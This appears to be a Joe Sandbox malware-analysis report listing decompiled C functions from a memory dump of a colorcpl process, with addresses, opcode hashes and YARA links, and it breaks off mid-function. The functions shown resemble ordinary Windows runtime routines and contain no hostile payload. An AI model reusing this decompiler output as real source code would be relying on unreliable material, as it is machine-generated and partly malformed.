                                                                                                Function 06E3C182 Relevance: .1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 68%
                                                                                                			E06E3C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E06E37D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E06EE8D34(_v8, _t80);
					}
					E06E32280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E06E2FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E06EE8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E06E2FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E06E5B180();
						if(_a4 != 0) {
							E06E32280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E06E3BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E06E3BB2D(_t16, _t15);
						E06E3B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E06E2FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E06E2FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E06E2FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                                0x06e3c18d
                                                                                                0x06e3c18f
                                                                                                0x06e3c191
                                                                                                0x06e3c19b
                                                                                                0x06e3c1a0
                                                                                                0x06e3c1d4
                                                                                                0x06e3c1de
                                                                                                0x06e82d6e
                                                                                                0x06e3c1e4
                                                                                                0x06e3c1e4
                                                                                                0x06e3c1e4
                                                                                                0x06e3c1ec
                                                                                                0x06e82d7d
                                                                                                0x06e82d7d
                                                                                                0x06e3c1f3
                                                                                                0x06e3c1ff
                                                                                                0x06e82d88
                                                                                                0x06e82d8d
                                                                                                0x06e82d94
                                                                                                0x06e82d94
                                                                                                0x06e82d9f
                                                                                                0x06e82da4
                                                                                                0x06e82dab
                                                                                                0x06e82db0
                                                                                                0x06e82db2
                                                                                                0x06e82db3
                                                                                                0x06e82db4
                                                                                                0x06e82dbc
                                                                                                0x06e82dc3
                                                                                                0x06e82dc3
                                                                                                0x06e3c205
                                                                                                0x06e3c205
                                                                                                0x06e3c208
                                                                                                0x06e3c20e
                                                                                                0x06e3c211
                                                                                                0x06e3c216
                                                                                                0x06e3c219
                                                                                                0x06e3c21f
                                                                                                0x06e3c222
                                                                                                0x06e3c22c
                                                                                                0x06e3c234
                                                                                                0x06e3c23a
                                                                                                0x06e3c23f
                                                                                                0x06e3c245
                                                                                                0x06e3c24b
                                                                                                0x06e3c251
                                                                                                0x06e3c25a
                                                                                                0x06e3c276
                                                                                                0x06e3c27d
                                                                                                0x06e3c27d
                                                                                                0x06e3c25c
                                                                                                0x06e3c25c
                                                                                                0x00000000
                                                                                                0x06e3c25e
                                                                                                0x06e3c1a4
                                                                                                0x06e3c1aa
                                                                                                0x06e3c1b3
                                                                                                0x06e3c265
                                                                                                0x06e3c26c
                                                                                                0x06e3c26c
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                • Instruction ID: ff55a3914ac21cb9bd9d26ad714310589cf1a0e5d67ae5a05070a7bfc703b413
                                                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                • Instruction Fuzzy Hash: 58317E71A01766BEE7C4EBB0CC84BEAF778BF46604F24615AC42C5B201DB349A09DBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E56DE6 Relevance: .1, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E06E56DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_t68 = __edx;
				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t4 = _t68 + 7; // 0xa
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = _t4 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
				if(_t64 == 0) {
					L14:
					if(E06E56EBE(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E06E46A60(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}


















                                                                                                0x06e56de6
                                                                                                0x06e56dee
                                                                                                0x06e56df1
                                                                                                0x06e56df4
                                                                                                0x06e56dfd
                                                                                                0x06e905d3
                                                                                                0x06e905d3
                                                                                                0x06e905e4
                                                                                                0x06e905f9
                                                                                                0x06e905f9
                                                                                                0x06e905fe
                                                                                                0x06e56e96
                                                                                                0x06e56e9c
                                                                                                0x06e56e9c
                                                                                                0x06e56e03
                                                                                                0x06e56e09
                                                                                                0x06e56e0c
                                                                                                0x06e56e12
                                                                                                0x06e56e15
                                                                                                0x06e56e1b
                                                                                                0x06e905a1
                                                                                                0x06e56eb1
                                                                                                0x06e56eb1
                                                                                                0x06e56eb1
                                                                                                0x06e56e21
                                                                                                0x06e56e2a
                                                                                                0x06e56e9f
                                                                                                0x06e56eab
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e56eab
                                                                                                0x06e56e2c
                                                                                                0x06e56e34
                                                                                                0x00000000
                                                                                                0x06e56e3d
                                                                                                0x06e56e3d
                                                                                                0x06e56e42
                                                                                                0x06e56e4d
                                                                                                0x06e905ac
                                                                                                0x06e905b2
                                                                                                0x06e905b2
                                                                                                0x00000000
                                                                                                0x06e905ac
                                                                                                0x06e56e56
                                                                                                0x06e56e59
                                                                                                0x06e56e5d
                                                                                                0x06e56e5f
                                                                                                0x06e56e64
                                                                                                0x06e56e94
                                                                                                0x06e56e94
                                                                                                0x00000000
                                                                                                0x06e56e94
                                                                                                0x06e56e6a
                                                                                                0x06e56e6d
                                                                                                0x06e905ba
                                                                                                0x06e905bd
                                                                                                0x06e905ca
                                                                                                0x06e905cc
                                                                                                0x06e56e91
                                                                                                0x06e56e91
                                                                                                0x00000000
                                                                                                0x06e56e91
                                                                                                0x06e905c0
                                                                                                0x00000000
                                                                                                0x06e905c0
                                                                                                0x06e56e7e
                                                                                                0x06e56e7e
                                                                                                0x06e56e80
                                                                                                0x06e56e86
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e56eba
                                                                                                0x06e56eba
                                                                                                0x06e56e88
                                                                                                0x06e56e8b
                                                                                                0x06e56e8f
                                                                                                0x00000000
                                                                                                0x06e56e8f

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                                                                                • Instruction ID: 61607640cbe45b99ae285b0feecc88bc4627a96f73434e33e1b4b7a132e0aade
                                                                                                • Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                                                                                • Instruction Fuzzy Hash: 9B31C731605305DFCB64CF28C880AAAB3A6FFC5314B95D55EE8598B260DF31F942CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EC3D40 Relevance: .1, Instructions: 98COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 70%
                                                                                                			E06EC3D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x6f0d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E06E32280(_t34, 0x6f08a6c);
				_t64 =  *0x6f05768; // 0x771a5768
				if(_t64 != 0x6f05768) {
					while(1) {
						_t8 = _t64 + 8; // 0x771a5770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E06E2FFB0(_t53, _t64, 0x6f08a6c);
						 *0x6f0b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E06E32280(_t45, 0x6f08a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x6f05768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E06E2FFB0(_t51, _t64, 0x6f08a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E06E5B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                                                                                0x06ec3d40
                                                                                                0x06ec3d48
                                                                                                0x06ec3d52
                                                                                                0x06ec3d59
                                                                                                0x06ec3d5d
                                                                                                0x06ec3d61
                                                                                                0x06ec3d63
                                                                                                0x06ec3d67
                                                                                                0x06ec3d69
                                                                                                0x06ec3d72
                                                                                                0x06ec3d76
                                                                                                0x06ec3d7a
                                                                                                0x06ec3d7f
                                                                                                0x06ec3d8b
                                                                                                0x06ec3d91
                                                                                                0x06ec3d91
                                                                                                0x06ec3d91
                                                                                                0x06ec3d94
                                                                                                0x06ec3d96
                                                                                                0x06ec3d9d
                                                                                                0x06ec3da1
                                                                                                0x06ec3db0
                                                                                                0x06ec3dba
                                                                                                0x06ec3dbc
                                                                                                0x06ec3dbc
                                                                                                0x06ec3dc6
                                                                                                0x06ec3dcb
                                                                                                0x06ec3dcf
                                                                                                0x06ec3dd1
                                                                                                0x06ec3dd4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ec3dd9
                                                                                                0x06ec3e0c
                                                                                                0x06ec3e0c
                                                                                                0x06ec3e0f
                                                                                                0x06ec3ddb
                                                                                                0x06ec3ddb
                                                                                                0x06ec3de0
                                                                                                0x00000000
                                                                                                0x06ec3de2
                                                                                                0x06ec3de2
                                                                                                0x06ec3de4
                                                                                                0x06ec3de8
                                                                                                0x06ec3deb
                                                                                                0x06ec3df1
                                                                                                0x00000000
                                                                                                0x06ec3df3
                                                                                                0x06ec3df3
                                                                                                0x06ec3df5
                                                                                                0x06ec3df8
                                                                                                0x06ec3dfa
                                                                                                0x00000000
                                                                                                0x06ec3dfa
                                                                                                0x06ec3df1
                                                                                                0x06ec3de0
                                                                                                0x06ec3e11
                                                                                                0x06ec3e11
                                                                                                0x00000000
                                                                                                0x06ec3dfe
                                                                                                0x06ec3e04
                                                                                                0x06ec3e06
                                                                                                0x00000000
                                                                                                0x06ec3e06
                                                                                                0x00000000
                                                                                                0x06ec3e04
                                                                                                0x06ec3d91
                                                                                                0x06ec3e15
                                                                                                0x06ec3e1a
                                                                                                0x06ec3e1f
                                                                                                0x06ec3e1f
                                                                                                0x06ec3e23
                                                                                                0x06ec3e29
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ec3e2e
                                                                                                0x00000000
                                                                                                0x06ec3e30
                                                                                                0x06ec3e30
                                                                                                0x06ec3e35
                                                                                                0x00000000
                                                                                                0x06ec3e37
                                                                                                0x06ec3e3e
                                                                                                0x06ec3e42
                                                                                                0x06ec3e48
                                                                                                0x06ec3e4e
                                                                                                0x00000000
                                                                                                0x06ec3e4e
                                                                                                0x06ec3e35
                                                                                                0x00000000
                                                                                                0x06ec3e2e
                                                                                                0x06ec3e5b
                                                                                                0x06ec3e5c
                                                                                                0x06ec3e5d
                                                                                                0x06ec3e68
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cf028263955ed0d243a1cc463c325baacd279859142960735b71a2131333c75f
                                                                                                • Instruction ID: 46e4f8d5836b360153159d9659668df7f10c0d0d73d850ad91d980d66a70d9c6
                                                                                                • Opcode Fuzzy Hash: cf028263955ed0d243a1cc463c325baacd279859142960735b71a2131333c75f
                                                                                                • Instruction Fuzzy Hash: 54319C71909302DFCB90DF14DA8085ABBE5FF85628F04996EF4A89B281D730DD05CBD2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4A70E Relevance: .1, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E06E4A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x6f07b10; // 0x18
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x6f07b10 = 8;
					 *0x6f07b14 = 0x6f07b0c;
					 *0x6f07b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x19
					E06E4A990(0x6f07b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L06E4A840(__edx, __ecx, __ecx, _t52, 0x6f07b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x6f07b10; // 0x18
					_t3 = _t37 + 0x27; // 0x3f
					__eflags = _t3 >> 5 -  *0x6f07b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x6f07b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x3f
						_v8 = _t4 >> 5;
						_t50 = L06E34620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x6f07b18 = _v8;
						_t8 = _t52 + 7; // 0x1f
						E06E5F3E0(_t50,  *0x6f07b14, _t8 >> 3);
						_t28 =  *0x6f07b14; // 0x771a7b0c
						__eflags = _t28 - 0x6f07b0c;
						if(_t28 != 0x6f07b0c) {
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x20
						 *0x6f07b14 = _t50;
						_t48 = _v12;
						 *0x6f07b10 = _t9;
						goto L6;
					}
					 *0x6f07b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                                0x06e4a713
                                                                                                0x06e4a714
                                                                                                0x06e4a717
                                                                                                0x06e4a71d
                                                                                                0x06e4a720
                                                                                                0x06e4a722
                                                                                                0x06e4a727
                                                                                                0x06e4a74a
                                                                                                0x06e4a754
                                                                                                0x06e4a75e
                                                                                                0x06e4a768
                                                                                                0x06e4a76a
                                                                                                0x06e4a773
                                                                                                0x06e4a78b
                                                                                                0x06e4a790
                                                                                                0x06e4a792
                                                                                                0x06e4a741
                                                                                                0x06e4a741
                                                                                                0x06e4a743
                                                                                                0x06e4a749
                                                                                                0x06e4a749
                                                                                                0x06e4a732
                                                                                                0x06e4a73a
                                                                                                0x06e4a797
                                                                                                0x06e4a79d
                                                                                                0x06e4a7a3
                                                                                                0x06e4a7a9
                                                                                                0x06e4a7b6
                                                                                                0x06e4a7bc
                                                                                                0x06e4a7ca
                                                                                                0x06e4a7e0
                                                                                                0x06e4a7e2
                                                                                                0x06e4a7e4
                                                                                                0x06e89bf2
                                                                                                0x00000000
                                                                                                0x06e89bf2
                                                                                                0x06e4a7ed
                                                                                                0x06e4a7f2
                                                                                                0x06e4a800
                                                                                                0x06e4a805
                                                                                                0x06e4a80d
                                                                                                0x06e4a812
                                                                                                0x06e89c08
                                                                                                0x06e89c08
                                                                                                0x06e4a818
                                                                                                0x06e4a81b
                                                                                                0x06e4a821
                                                                                                0x06e4a824
                                                                                                0x00000000
                                                                                                0x06e4a824
                                                                                                0x06e4a7ae
                                                                                                0x00000000
                                                                                                0x06e4a7ae
                                                                                                0x06e4a73c
                                                                                                0x06e4a73e
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3161dd1fb942b0e81e1a0ad94db6fc9fa091280f9abf4e6aa89d1ef72b0c0fdd
                                                                                                • Instruction ID: 728c3fa19a70d9b4f30917b435646496a427e1391cc2e674315ff9620ce152a4
                                                                                                • Opcode Fuzzy Hash: 3161dd1fb942b0e81e1a0ad94db6fc9fa091280f9abf4e6aa89d1ef72b0c0fdd
                                                                                                • Instruction Fuzzy Hash: F131C2F16043489FE7A1FB18EC84F6577FAFB84728F5409A9E21587288D370B945CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E1AA16 Relevance: .1, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E06E1AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x6f0d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x6f07b9c; // 0x0
					_t53 = L06E34620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E06E5B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E06E5F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L06E26C59(_t53, _t51, _t58) != 0) {
							_t28 = E06E45E50(0x6dfc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E06E4B230(_v32, _v28, 0x6dfc2d8, 1,  &_v24);
								_t28 = E06E1F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                                0x06e1aa25
                                                                                                0x06e1aa29
                                                                                                0x06e1aa2d
                                                                                                0x06e1aa30
                                                                                                0x06e1aa37
                                                                                                0x06e1aa3c
                                                                                                0x06e74458
                                                                                                0x06e74458
                                                                                                0x06e74472
                                                                                                0x06e74474
                                                                                                0x06e74476
                                                                                                0x06e1aa64
                                                                                                0x06e1aa74
                                                                                                0x06e7447c
                                                                                                0x06e74483
                                                                                                0x06e74492
                                                                                                0x06e1aa52
                                                                                                0x06e1aa54
                                                                                                0x06e1aa5e
                                                                                                0x06e744a8
                                                                                                0x06e744ad
                                                                                                0x06e744af
                                                                                                0x06e744b6
                                                                                                0x06e744b6
                                                                                                0x06e744b9
                                                                                                0x06e744bc
                                                                                                0x06e744cd
                                                                                                0x06e744d3
                                                                                                0x06e744d6
                                                                                                0x06e744e1
                                                                                                0x06e744e1
                                                                                                0x06e744e6
                                                                                                0x06e744e8
                                                                                                0x06e744fb
                                                                                                0x06e744fb
                                                                                                0x06e744e8
                                                                                                0x00000000
                                                                                                0x06e1aa5e
                                                                                                0x06e74476
                                                                                                0x06e1aa42
                                                                                                0x06e1aa46
                                                                                                0x06e1aa48
                                                                                                0x06e1aa4c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 229d879ceb7f90f3b96df8baff6fa0e7ebcb0db0de6e76ee2e5a77974439e658
                                                                                                • Instruction ID: b0c747d3af7963f4ef9db6dd6c59a6cc943c1471a25431d74f9a71299d05060c
                                                                                                • Opcode Fuzzy Hash: 229d879ceb7f90f3b96df8baff6fa0e7ebcb0db0de6e76ee2e5a77974439e658
                                                                                                • Instruction Fuzzy Hash: B931D171A10329EBDF90AF68CD81ABFB7B9EF04700B015069F915EB180E7749911EBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E461A0 Relevance: .1, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 97%
                                                                                                			E06E461A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
